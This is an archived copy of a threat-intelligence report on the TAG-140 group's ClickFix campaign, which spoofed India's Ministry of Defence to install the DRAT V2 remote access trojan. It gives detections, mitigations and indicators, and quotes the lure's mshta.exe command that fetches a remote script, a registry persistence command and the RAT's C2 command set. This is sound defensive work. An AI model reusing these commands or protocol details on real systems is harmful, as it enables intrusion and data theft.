{ "id": "65e6f988-b402-45bb-844f-7c60cb0a4bc9", "created_at": "2026-04-06T00:10:03.784884Z", "updated_at": "2026-04-10T03:36:50.201653Z", "deleted_at": null, "sha1_hash": "79f4b1bcebeeb5fb35820153d72dea177ecc15e0", "title": "Analysis of TAG-140 Campaign and DRAT V2 Development Targeting Indian Government Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2472613, "plain_text": "Analysis of TAG-140 Campaign and DRAT V2 Development\r\nTargeting Indian Government Organizations\r\nBy Insikt Group®\r\nArchived: 2026-04-05 19:07:00 UTC\r\nExecutive Summary\r\nDuring an investigation into a recent TAG-140 campaign targeting Indian government organizations, Insikt Group\r\nidentified a modified variant of the DRAT remote access trojan (RAT), which we designated as DRAT V2. TAG-140 has overlaps with SideCopy, an operational subgroup assessed to be a sub-cluster or operational affiliate of\r\nTransparent Tribe (also tracked as APT36, ProjectM, or MYTHIC LEOPARD). TAG-140 has consistently\r\ndemonstrated iterative advancement and variety in its malware arsenal and delivery techniques. This latest\r\ncampaign, which spoofed the Indian Ministry of Defence via a cloned press release portal, marks a slight but\r\nnotable shift in both malware architecture and command-and-control (C2) functionality.\r\nThe deployment of DRAT V2 reflects TAG-140’s ongoing refinement of its remote access tooling, transitioning\r\nfrom a .NET-based version of DRAT to a new Delphi-compiled variant. Both versions are among numerous RATs\r\nthe group has leveraged, such as CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, and ReverseRAT,\r\nindicating a pattern of rotating malware use. DRAT V2 updates its custom TCP-based, server-initiated C2 protocol\r\nand expands functional capabilities, including arbitrary shell command execution and enhanced file system\r\ninteraction.\r\nAnalysis of the infection chain indicates that initial access was achieved through a ClickFix-style social\r\nengineering lure. Victims were enticed to execute a malicious script via mshta.exe, which led to the execution of\r\nthe BroaderAspect .NET loader, which has previously been used by TAG-140. BroaderAspect establishes\r\npersistence and subsequent DRAT V2 installation and execution.\r\nInsikt Group attributes this activity to TAG-140 with moderate confidence based on domain overlap, malware\r\nlineage, and infrastructure characteristics. DRAT V2’s enhancements suggest a likely increase in TAG-140’s\r\ncapacity for tailored post-exploitation and lateral movement across victim networks. As such, its emergence is a\r\nrelevant indicator of the threat actor’s maturing tradecraft and strategic targeting of India’s defense and\r\ngovernmental institutions.\r\nKey Findings\r\nDRAT V2 adds a new command (exec_this_comm) for arbitrary shell command execution, enhancing post-exploitation flexibility.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 1 of 20\n\nThe malware obfuscates its C2 IP addresses using Base64 encoding with prepended strings to hinder\r\nstraightforward decoding.\r\nCompared to its predecessor, DRAT V2 reduces string obfuscation by keeping most command headers in\r\nplaintext, likely prioritizing parsing reliability over stealth.\r\nDRAT V2 updates its custom server-initiated TCP protocol to support commands input in both ASCII and\r\nUnicode, while responding in ASCII only.\r\nDRAT V2 lacks advanced anti-analysis techniques and relies on basic infection and persistence methods,\r\nmaking it detectable via static and behavioral analysis.\r\nBackground\r\nTAG-140 is a threat actor group that overlaps with the publicly reported group Sidecopy, a suspected Pakistani\r\nstate-aligned advanced persistent threat (APT) group assessed to be a sub-cluster or operational affiliate of\r\nTransparent Tribe (also tracked as APT36, ProjectM, or MYTHIC Leopard). Active since at least 2019, TAG-140\r\nprimarily targets Indian entities, with recent activity expanding beyond traditional government, defense, maritime,\r\nand academic sectors to now include organizations affiliated with the country’s railway, oil and gas, and external\r\naffairs ministries.\r\nThe group has demonstrated (1, 2, 3) a consistent evolution in its tradecraft: leveraging spearphishing campaigns,\r\nusing HTML applications (HTAs) or Microsoft Installer (MSI) packages for distribution, exploiting software\r\nvulnerabilities (for example, WinRAR), and using many different RATs such as CurlBack, SparkRAT, AresRAT,\r\nXeno RAT, AllaKore, ReverseRAT, and DRAT. Their infection chains commonly target both Windows and Linux\r\nenvironments.\r\nInsikt Group analyzed artifacts from a recent ClickFix campaign spoofing the Indian Ministry, which we have\r\nattributed to TAG-140 threat actors. TAG-140 created a counterfeit website mimicking the Indian Ministry of\r\nDefence's official press release portal using the malicious domain email[.]gov[.]in[.]drdosurvey[.]info, which\r\nclosely resembles the legitimate government website mod[.]gov[.]in (urlscan.io). The cloned website replicated\r\nthe structure and layout of the authentic portal, listing press releases from September 2023 to April 2025.\r\nHowever, only the link for March 2025 was active.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 2 of 20\n\nFigure 1: Cloned Ministry of Defense portal (Source: Hunt.io)\r\nClicking the active March 2025 link triggered a ClickFix-style social engineering attack. Insikt Group conducted\r\nadditional analysis of the TAG-140 Windows infection chain and determined it to be similar to an infection chain\r\nreported by Seqrite Labs in their research on TAG-140 activity, which was identified in late 2024. Our analysis of\r\nthe infection chain (Figure 2) reveals that the final payload is a new Delphi-based variant of DRAT (referred to as\r\nDRAT V2). Previously, DRAT was developed in .NET and was first attributed to SideCopy activity in 2023. The\r\nupdated variant includes new command functionality and a slightly modified C2 protocol.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 3 of 20\n\nFigure 2: TAG-140 infection chain dropping DRAT V2 (Source: Recorded Future)\r\n1. The user is directed to the URL below (urlscan.io). While we do not know the delivery mechanism used, based\r\non TAG-140’s tactics, techniques, and procedures (TTPs), this is likely delivered as a spearphishing email enticing\r\nthe user to click on the link. The user is then lured to click on the “March 2025 Release” link. From a Windows\r\nmachine, clicking on that link redirects the user to the uniform resource identifier (URI) /captcha/windows.php.\r\nhxxps://email[.]gov[.]in[.]drdosurvey[.]info/content/press-releases-ministry-defence-0.html\r\n2. The redirected website (urlscan.io) displays the warning “**Disclosure - For Official Use Only (FOUO)**” and\r\nasks the user to click “continue.”\r\n3. Clicking “continue” runs JavaScript that copies the malicious command below to the clipboard and directs the\r\nuser to paste and execute it in a command shell. The command uses mshta.exe to fetch and run a remote script\r\n(index.php/sysinte.hta) from TAG-140’s infrastructure, _trade4wealth[.]in_.\r\nconst calcPath = \"C:\\\\Windows\\\\System32\\\\mshta.exe\r\nhxxps://trade4wealth[.]in/admin/assets/css/default/index.php\";\r\nnavigator.clipboard.writeText(calcPath)\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 4 of 20\n\n4. Execution of index.php/sysinte.hta creates and executes the BroaderAspect loader, first reported on by Seqrite\r\nLabs. BroaderAspect performs the following actions:\r\na. Downloads and opens the decoy document survey.pdf from the following URL:\r\nhxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/01/survey.pdf\r\nb. Creates and executes a Windows batch file named noway.bat, which contains a command that establishes\r\npersistence for DRAT v2 by adding a registry entry to a Microsoft-defined autostart location\r\nREG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Edgre\" /t REG_SZ /F\r\n/D \"cmd /C start C:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nc. Downloads and decompresses the DRAT V2 payload from the following URLs:\r\nInitial Request: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02\r\nRedirect: hxxps://trade4wealth[.]in/admin/assets/css/Vertical-layout-design/02/ayty.ert\r\nd. Executes DRAT V2 with the following command:\r\nC:\\Windows\\system32\\cmd.exe /c cmd /C start\r\nC:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nInsikt Group attributes this activity to TAG-140 with moderate confidence based on the following aspects:\r\n1. The impersonation and targeting of Indian defense organizations, such as the Indian Ministry of Defense,\r\naligns with known TAG-140 targets.\r\n2. Use of BroaderAspect loader and DRAT (either variant), both of which seem to be exclusively used by\r\nTAG-140 (1, 2), aligns with TAG-140 TTPs.\r\n3. The domain email[.]gov[.]in[.]drdosurvey[.]info overlaps with other APT36 attacks (1, 2) and uses\r\nNamecheap as its hosting provider. We have observed in multiple instances that TAG-140 commonly uses\r\nNamecheap, along with GoDaddy and Hostinger (1, 2, 3, 4).\r\n4. In addition to DRAT V2, TAG-140 has previously used Delphi-based malware, such as the open-source\r\nAllaKore RAT.\r\nTechnical Analysis\r\nDRAT V2 is a lightweight RAT developed in Delphi and represents an evolution of the earlier .NET-based variant\r\nfirst attributed to TAG-140 in 2023. DRAT V2 introduces several updates from its predecessor, including:\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 5 of 20\n\nAn update to its custom TCP server-initiated C2 protocol\r\nEnhanced Base64 obfuscation of C2 infrastructure with added prepended strings\r\nUpdated command headers and a new command for the execution of arbitrary Windows commands\r\nA high-level overview of DRAT V2 is provided in Figure 3.\r\nFigure 3: DRAT V2 summary (Source: Recorded Future)\r\nDRAT V2 supports a set of commands that allow TAG-140 operators to perform a wide range of interactions with\r\ncompromised hosts. Upon establishing communication, the malware passively awaits instructions from the C2\r\nserver. Supported operations include system reconnaissance, such as collecting the username, operating system\r\nversion, system time, and current working directory, as well as connectivity validation and enumeration of local\r\nfile systems and directories.\r\nBeyond reconnaissance, DRAT V2 facilitates more active engagement with the target environment. It enables file\r\ntransfers in both directions between the host and the C2 infrastructure, allowing operators to upload additional\r\npayloads or exfiltrate data. Additionally, it supports the execution of local files and arbitrary Windows shell\r\ncommands, returning the output to the C2. These functions provide TAG-140 with persistent, flexible control over\r\nthe infected system and allow for both automated and interactive post-exploitation activity without requiring the\r\ndeployment of auxiliary malware tools. Figure 4 provides a summary of DRAT V2’s capabilities.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 6 of 20\n\nFigure 4: DRAT V2 capability matrix (Source: Recorded Future)\r\nDRAT V2 Commands\r\nDRAT V2 continues its use of a command interface that is a custom TCP, text-based, server-initiated protocol to\r\nsupport remote control capabilities across a compromised host. Command execution, file manipulation, and\r\nsystem reconnaissance are enabled through a structured format.\r\nThe DRAT V2 command protocol is distinguished by the use of tilde (~) and pipe (|) characters as delimiters.\r\nUpon establishing connectivity with its C2 infrastructure, the malware enters a passive state, awaiting inbound\r\ninstructions from the server. These instructions span nine discrete command types (Table 1), encompassing\r\ncapabilities such as host reconnaissance, file management, and direct execution. Each command follows a\r\ndeterministic format, allowing the operator to orchestrate post-compromise actions with consistency and low\r\noverhead.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 7 of 20\n\nDRAT V2\r\nCommand\r\nCapability Description\r\ninitial_infotonas System Information\r\nThis command initiates system-level reconnaissance by\r\nrequesting host environment details, including username,\r\nOS version, timestamp, and working directory. The\r\nresponse is structured across seven fields.\r\nsup\r\nEcho/Connectivity\r\nTest\r\nThis command is used to verify active communication with\r\nthe compromised host.\r\nlst_of_sys_drvs List Volumes\r\nThis command allows DRAT V2 to enumerate accessible\r\nlogical drives on the target machine.\r\nhere_are_dir_details\r\nList Directories and\r\nFiles with Info\r\nThis command retrieves structured metadata for directories\r\nand files, including name, size, timestamp, and path.\r\nNotably, the implementation contains a flaw where the full\r\npath concatenates improperly with subsequent entries,\r\npotentially impacting operator parsing.\r\nfilina_for_down File Size\r\nThis command is used to retrieve the byte size of a\r\nspecified file.\r\nfile_upl File Upload\r\nThis command supports the transfer of files from the C2 to\r\nthe target host. The command requires specification of both\r\nthe file path and size, facilitating payload staging or\r\ndeployment of secondary tools.\r\nthis_filina_exec File Execution\r\nThis command executes a specified file on the host system.\r\nThis capability enables the delivery of additional payloads\r\nor the execution of existing binaries within the local file\r\nsystem.\r\nfil_down_confirmina File Download This command enables exfiltration of files from the victim\r\nsystem to the C2 server. Unlike other responses, there is no\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 8 of 20\n\nDRAT V2\r\nCommand\r\nCapability Description\r\nresponse header, and only the raw file contents are sent to\r\nthe C2.\r\nexec_this_comm Command Execution\r\nThis command permits arbitrary shell command execution\r\non the infected host. This adds significant flexibility for\r\ninteractive operations, enabling real-time tasking and on-demand post-exploitation activity.\r\nTable 1: DRAT V2 commands (Source: Recorded Future)\r\nThis command set enables TAG-140 to support a range of post-exploitation objectives, including host\r\nreconnaissance, data staging, and potential lateral movement. Notably, DRAT V2 extends the functionality of its\r\npredecessor by incorporating support for arbitrary command execution. Appendix B provides detailed\r\nbreakdowns of each command, including parameters.\r\nFigure 5 shows an example of the C2 communication between an infected host and the C2. In this example, the\r\nC2 server sends the command exec_this_comm~whoami, which tells the infected host to execute the command\r\nwhoami. The infected host then responds with the output of the command.\r\nFigure 5: DRAT V2 command execution request and response packets recorded and displayed by Wireshark\r\n(Source: Recorded Future)\r\nThis comparative analysis highlights the technical and operational differences between the original DRAT and\r\nDRAT V2. The shift in development platforms marks a significant architectural transition that affects how the\r\nmalware is compiled, executed, and potentially detected. Although both variants maintain similar core\r\nfunctionalities as lightweight RATs, DRAT V2 introduces meaningful enhancements in its command structure, C2\r\nobfuscation techniques, and communication protocol while also minimizing its use of string obfuscation. These\r\nadaptations likely reflect TAG-140’s continued efforts to evolve their tooling for improved evasion, modularity,\r\nand flexibility in post-exploitation operations.\r\nCommand Header Variation\r\nWhile both DRAT variants implement similar commands for remote administration, each version uses distinct\r\nnaming conventions for command headers. For instance, DRAT’s system information command is labeled\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 9 of 20\n\ngetInformitica, whereas DRAT V2 uses initial_infotonas. DRAT V2 also introduced a new command,\r\nexec_this_comm, which enables arbitrary shell command execution on the infected host, an enhancement not\r\npresent in the original DRAT and indicative of expanded post-exploitation capabilities. The below comparison\r\ntable (Table 2) presents a detailed, line-by-line breakdown of request and response headers across both versions.\r\nIn that table, command mappings highlighted in green denote commands that are functionally retained across both\r\nvariants, while items highlighted in yellow represent new additions exclusive to DRAT V2.\r\nCommand DRAT Command Header DRAT V2 Command Header\r\nSystem Information Request getInformitica initial_infotonas\r\nSystem Information Response informiticaBack| my_ini_info|\r\nEcho/Connectivity Test Request sup sup\r\nEcho/Connectivity Test Response supconfirm hello_frm_me\r\nList Volumes Request drivesList lst_of_sys_drvs\r\nList Volumes Response drivesList lst_of_sys_drvs\r\nList directories and files with info\r\nRequest\r\nenterPath here_are_dir_details\r\nList directories and files with info\r\nResponse\r\nenterPath here_are_dir_details\r\nFile Size Request fdl filina_for_down\r\nFile Size Response fInfo fileina_detailwa\r\nFile Upload Request fup file_upl\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 10 of 20\n\nCommand DRAT Command Header DRAT V2 Command Header\r\nFile Upload Response fupConfirm file_upl_confrm\r\nFile Exec Request fupexec this_filina_exec\r\nFile Exec Response\r\nfupexecConfirm\r\nfileExecuted\r\nfile_exec_confirm\r\nFile Download Request fdlConfirm fil_down_confirmina\r\nCommand Execution Request exec_this_comm\r\nCommand Execution Response comm_resultwa\r\nFile Download Response [File Content] [File Content]\r\nTable 2: Command comparison between DRAT and DRAT V2 (Source: Recorded Future)\r\nText Format in C2 Communications\r\nBoth versions leverage text-based communication protocols for C2 interactions. However, they differ in encoding\r\nrequirements: DRAT V2 accepts commands in both Unicode and ASCII, but always responds in ASCII, whereas\r\nthe original DRAT mandates Unicode for both input and output (Figure 6).\r\nFigure 6: DRAT V1 list volumes request and response recorded and displayed by Wireshark (Source: Recorded\r\nFuture)\r\nDifferences in System Information\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 11 of 20\n\nThe system information response of both versions includes many similarities, but several differences include the\r\ntext in Unicode, different command request headers, and WinDefender instead of win-def, both of which are hard-coded. Finally, the format of the Windows version in the system information response varies between DRAT and\r\nDRATV2. DRAT simply returns the value from the registry key, Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\ProductName, while DRAT V2 gets the Windows version using the API call GetVersionExW()\r\nand returns a custom string that is Base64-encoded in the source code. Table 3 outlines the differences between\r\nthe two commands.\r\nSystem\r\nInformation\r\nComponents\r\nDRAT System Information\r\nResponse\r\nDRAT V2 System Information Response\r\nCommand\r\nSeparator\r\nData after the ~ character from the\r\ninbound request\r\nData after the ~ character from the inbound request\r\nN.A Field Hard-coded \"N.A\" Hard-coded \"N.A\"\r\nUsername\r\nField\r\nUsername retrieved via\r\nSystemInformation.Username()\r\nUsername retrieved via System::Sysutils::\r\nGetEnvironmentVariable(\"USERNAME\")\r\nWindows\r\nVersion Field\r\nThe Windows version retrieved by:\r\nSoftware\\Microsoft\\Windows\r\nNT\\CurrentVersion\\ProductName\r\nExample: Windows 10 Pro\r\nThe Windows version retrieved by\r\nGetVersionExW() is translated into one of the\r\nfollowing:\r\nV2luZG93cyAxMSBPUw==\r\nWindows 11 OS\r\nV2luZG93cyAxMCBPUw==\r\nWindows 10 OS\r\nV2luZG93cyA4IG9yIDEw\r\nWindows 8 or 10\r\nV2luZG93cyA3IE9T\r\nWindows 7 OS\r\nVW5rbm93biBXaW5kb3dzIFZlcnNpb24=\r\nUnknown Windows Version\r\nIdentifier\r\nField\r\nHard-coded Win Defender Hard-coded win-def\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 12 of 20\n\nSystem\r\nInformation\r\nComponents\r\nDRAT System Information\r\nResponse\r\nDRAT V2 System Information Response\r\nDate/Time\r\nStamp Field\r\nCurrent date and time in\r\nDD/MM/YYYY HH:MM:SS\r\nAM/PM format, retrieved via\r\nDateTime.Now.ToString()\r\nCurrent date and time in YYYY-MM-DD HH:MM:\r\nSS format, retrieved via SysUtils::Now()\r\nWorking Path\r\nField\r\nFull path of the working directory Full path of the working directory\r\nTable 3: DRAT vs DRAT V2 system information request and response fields (Source: Recorded Future)\r\nDifferences in C2 Obfuscation\r\nIn both DRAT variants, the C2 information is Base64-encoded. DRAT encodes the C2 IP address directly, while\r\nDRAT V2 modifies its approach to C2 obfuscation by prepending one of the following strings to the IP address\r\nprior to Base64 encoding:\r\n\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\r\nXXXXXXXXXXXXXXXXXXXXXX\r\nExample encoded C2 IP with prefix: PD48Pjw+PD48Pjw+PD48Pjw+PD48PjE4NS4xMTcuOTAuMjEy\r\nExample decoded C2 IP with prefix: \u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e\u003c\u003e185.117.90.212\r\nThese prepended patterns likely serve as rudimentary integrity checks or help prevent trivial decoding by analysts\r\nand automated tools.\r\nString Obfuscation\r\nString obfuscation strategies also differ between the variants. DRAT employs a more extensive scheme, using a\r\nsubstitution algorithm to encode both commands and operational strings. DRAT V2, on the other hand, selectively\r\nobfuscates strings, such as Windows version and C2 information, but leaves command headers in plaintext. This\r\nlimited obfuscation approach in DRAT V2 may represent a trade-off between stealth and parsing reliability.\r\nDetections\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 13 of 20\n\nDetections\r\nSnort\r\nDetect DRAT Malware Outbound C2 Communication: Use these Snort rules to\r\ndetect outbound DRAT and DRAT V2 C2 communication.\r\nSigma Detect TAG-140 Persistence via Run Key: Use this Sigma rule to detect TAG-140\r\nattacks that establish persistence by creating a registry run key via a batch file when\r\nthe batch file is missing the closing quotations in the command.\r\nYARA\r\nDetect BroaderAspect Loader used by TAG-140: Use this YARA rule to detect files\r\ncontaining strings associated with the BroaderAspect malware, including .pdf and\r\n.bat file extensions and specific malware identifiers.\r\nDetect DotNet and Delphi variants of the DRAT malware used by TAG-140: Use\r\nthese YARA rules to detect DRAT and DRAT V2\r\nMitigations\r\nBlock or monitor outbound TCP connections to uncommon destination ports used by DRAT V2 for C2\r\noperations, such as 3232, 6372, and 7771. Monitor anomalous TCP traffic that does not match known\r\nprotocols that target high-numbered ports.\r\nInspect network traffic for outbound command responses and inbound shell command instructions\r\n(Appendix B) encoded in Base64, ASCII, or Unicode formats. Emphasize traffic decoding and inspection,\r\nespecially over TCP sessions established to unusual ports.\r\nUse the detection rules in this report to identify DRAT V2 execution and persistence via registry run keys,\r\nfile-based loaders, and encoded C2 patterns. Deploy custom YARA rules to detect both .NET and Delphi-compiled DRAT samples.\r\nDeploy detection logic to monitor , which invokes remote scripts or launches secondary payloads. This is a\r\nkey component in the infection chain, where malicious HTA scripts fetch and launch DRAT loaders like\r\nBroaderAspect.\r\nMonitor registry modification events, particularly those involving\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. TAG-140 uses these for persistence by\r\nexecuting DRAT V2 via disguised filenames in C:\\Users\\Public\u003c/span\u003e.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 14 of 20\n\nOutlook\r\nTAG-140’s deployment of DRAT V2 is consistent with the group’s long-standing practice of maintaining a broad\r\nand interchangeable suite of remote access trojans. This continued diversification complicates attribution,\r\ndetection, and monitoring activity. DRAT V2 appears to be another modular addition rather than a definitive\r\nevolution, reinforcing the likelihood that TAG-140 will persist in rotating RATs across campaigns to obscure\r\nsignatures and maintain operational flexibility.\r\nDespite these challenges, the DRAT V2 infection chain exhibits limited use of defensive evasion or anti-analysis\r\ntechniques. The absence of code obfuscation, sandbox evasion, or complex loader behaviors increases the\r\nfeasibility of early detection through basic telemetry and static analysis. Security teams should anticipate\r\ncontinued experimentation with malware tooling and infection chains. Monitoring for spearphishing\r\ninfrastructure, loader reuse, and behavioral indicators, rather than specific malware families, will be critical in\r\nsustaining visibility into TAG-140 activity.\r\nAppendix A: Indicators of Compromise\r\nDRAT V2\r\nce98542131598b7af5d8aa546efe8c33a9762fb70bff4574227ecaed7fff8802\r\n0d68012308ea41c6327eeb73eea33f4fb657c4ee051e0d40a3ef9fc8992ed316\r\nc73d278f7c30f8394aeb2ecbf8f646f10dcff1c617e1583c127e70c871e6f8b7\r\nDRAT\r\n830cd96aba6c328b1421bf64caa2b64f9e24d72c7118ff99d7ccac296e1bf13d\r\nc328cec5d6062f200998b7680fab4ac311eafaf805ca43c487cda43498479e60\r\nDRAT V2 C2\r\n185[.]117[.]90[.]212:7771\r\n154[.]38[.]175[.]83:3232\r\n178[.]18[.]248[.]36:6372\r\nDRAT C2\r\n38[.]242[.]149[.]89:61101\r\nAppendix B: DRAT V2 Command Parameters and Response\r\nSystem Information\r\nThe initial_infotonas command initiates system-level reconnaissance by requesting host environment details,\r\nincluding username, OS version, timestamp, and working directory. The response is structured across seven fields.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 15 of 20\n\nSystem Information Request Header Parameters Parameter Description\r\ninitial_infotonas 1 Unknown: sequential numbers were observed\r\nSystem\r\nInformation\r\nResponse Header\r\nParameters Parameter Description\r\nmy_ini_info| 7\r\n1: Data after the ~ character from the inbound request\r\n2: Hard-coded string \"N.A\"\r\n3: Username retrieved via System::Sysutils::\r\nGetEnvironmentVariable(\"USERNAME\")\r\n4: Windows version retrieved by GetVersionExW(), translated\r\ninto one of the following, which is Base64-encoded in the source\r\ncode:\r\nWindows 11 OS\r\nWindows 10 OS\r\nWindows 8 or 10\r\nWindows 7 OS\r\nUnknown Windows Version\r\n5: Hard-coded string win-def\r\n6: Current date and time in the YYYY-MM-DD HH:MM:SS\r\nformat, retrieved via System::Sysutils::Now()\r\n7: Full path of the working directory\r\nEcho/Connectivity Test\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 16 of 20\n\nThe sup command is used to verify active communication with the compromised host.\r\nEcho/Connectivity Test Request Header Parameters Parameter Description\r\nsup 0\r\nCommand Execution Response Header Parameters Parameter Description\r\nhello_frm_me 0\r\nList Volumes\r\nThe lst_of_sys_drvs command allows DRAT V2 to enumerate accessible logical drives on the target machine.\r\nList Volumes Request Header Parameters Parameter Description\r\nlst_of_sys_drvs 0\r\nList Volumes Response Header Parameters Parameter Description\r\nlst_of_sys_drvs 1\r\nList of volumes in the following format:\r\n[volume letter\r\n1]:\\1000000\\r\\n[volume letter\r\n2]1000000\\r\\n[volume letter\r\nn]1000000\\r\\\r\nList Directories with Attributes\r\nThe here_are_dir_details command retrieves structured metadata for directories and files, including name, size,\r\ntimestamp, and path. Notably, the implementation contains a flaw where the full path concatenates improperly\r\nwith subsequent entries, potentially impacting operator parsing.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 17 of 20\n\nList Directories Request Header Parameters Parameter Description\r\nhere_are_dir_details 1 Directory path\r\nList Directories Response\r\nHeader\r\nParameters Parameter Description\r\nhere_are_dir_details 1\r\nList of sub-directories and files with attributes in the\r\nfollowing format, separated by \"+\":\r\nDirectory or filename\r\nFile size in bytes or \"N/A\" for directories\r\nTimestamp of file using Sysutils::FileAge or the\r\ndefault 1899-12-29 00:00:00 for directories\r\nFull path\r\nFile Size\r\nThe filina_for_down command is used to retrieve the byte size of a specified file.\r\nFile Size Request Header Parameters Parameter Description\r\nfilina_for_down 1 File path\r\nFile Size Response Header Parameters Parameter Description\r\nfileina_detailwa 1 Size in bytes of the file\r\nFile Upload\r\nThe file_upl~ command supports the transfer of files from the C2 to the target host. The command requires\r\nspecification of both the file path and size, facilitating payload staging or deployment of secondary tools.\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 18 of 20\n\nFile Upload Request Header Parameters Parameter Description\r\nfil_upl~ 2 File path and size\r\nFile Upload Response Header Parameters Parameter Description\r\nfil_upl_confrm 0\r\nFile Execution\r\nThe this_filina_exec command executes a specified file on the host system. This capability enables the delivery of\r\nadditional payloads or the execution of existing binaries within the local file system.\r\nFile Execution Request Header Parameters Parameter Description\r\nthis_filina_exec 1 Full path of the file to execute\r\nFile Execution Response\r\nfile_exec_confirm\r\nFile Download\r\nThe fil_down_confirmina command enables exfiltration of files from the victim system to the C2 server. Unlike\r\nother responses, there is no response header, and only the raw file contents are sent to the C2.\r\nFile Download Request Header Parameters Parameter Description\r\nfil_down_confirmina 1 Full path of the file to download\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 19 of 20\n\nFile Download Response Header Parameters Parameter Description\r\nDoes not have a header 0 Raw file contents\r\nCommand Execution\r\nThe exec_this_comm command permits arbitrary shell command execution on the infected host. This adds\r\nsignificant flexibility for interactive operations, enabling real-time tasking and on-demand post-exploitation\r\nactivity.\r\nCommand Execution Request Header Parameters Parameter Description\r\nexec_this_comm 1 Windows command\r\nCommand Execution Response Header Parameters Parameter Description\r\ncomm_resultwa 1 Requested Windows command response\r\nTo read the entire analysis, click here to download the report as a PDF.\r\nSource: https://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nhttps://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal" ], "report_names": [ "drat-v2-updated-drat-emerges-tag-140s-arsenal" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "5cdcbec3-d174-440f-a2e1-75d86143a1a3", "created_at": "2026-02-07T02:00:03.66831Z", "updated_at": "2026-04-10T02:00:03.963444Z", "deleted_at": null, "main_name": "TAG-140", "aliases": [], "source_name": "MISPGALAXY:TAG-140", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", 